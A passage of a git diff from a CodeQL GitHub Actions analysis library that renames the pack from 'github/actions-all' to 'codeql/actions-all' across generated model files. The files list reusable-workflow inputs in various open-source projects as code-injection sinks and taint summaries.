b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 663826781e7a..8a22c8415e63 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index c0b8992a6786..a5db7a9533e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a7069a8fa4fa..31113d603ffc 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 3ec3c008301a..d8e08a8e2bd8 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f4c09189ba64..b7478e325a2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 46b715358e06..fff04025bc52 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index ca728bfced25..be5ac94db5c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c31b5c8fe0c6..b8633806ac7e 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index e53c0a2780b6..8e534e5be923 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 2c904674125a..44aa0ea3a928 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index cff10b709e9b..cd17a2ca4a59 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 31e4dbbf7ab6..d96c0c99d0c1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 5aca8a7070da..f07f5ba54ea7 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 179c882eba19..391108291479 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index a702bdd47843..196c25e14e95 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 105a5b49f3dd..7a2e2fea0eb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 4e4aa9f79861..d00a80de5d1e 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 4272f3376ce1..4f7926a22a68 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] 
@@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4752bce29b9f..a0c0b5638dd0 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e493955ca4cd..494c63d62720 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index e3c0040f7dfb..bd855d53f139 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index daaa34ab8ab1..f499896a72ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 9bfe61804816..66bd5e8b99d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index d8cd44f08ee9..fc0d7a48ca31 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 9b1fd73494e7..e3a048ee25cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 2fafb1f39b6a..db3fb546f0f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 0f4b87acc625..3a1b8c8403ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 4b58c4a27b1b..9f633ceca2a3 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 36e6df71d47a..96eb05c06992 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 444291b0c50b..9448aaeabe1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index ebd11dd18113..d9af00581aa1 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 3dfd3db12f59..aee71d38351f 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index a47ce91bf1b0..cb06e03a0b20 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index f4114b0a3960..837ac52856bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index a5b367ab3557..737350d2379e 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 5aab353540a0..3fd4d6157783 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index db6b7c28c514..caf13251f20f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index bd2ceb9eeb16..2f8790197e1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index d52fc08b2fe0..f51482fc02e4 100644 
--- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 8a664d1bc87b..67b335536ac9 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index bbfe6cfc5015..514fbac1d52f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 75bbf328d641..6a578723d865 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 6cd55f46f646..14afd31d1524 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4c85243e4155..772dd2e7c713 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index fd1c5ae41497..477e782dde65 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index d848e7587ca3..4d66b2854034 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index e2e3fa8f5936..8bd5aacbd9b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 69d627bdc7fb..cd1933d8a235 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml 
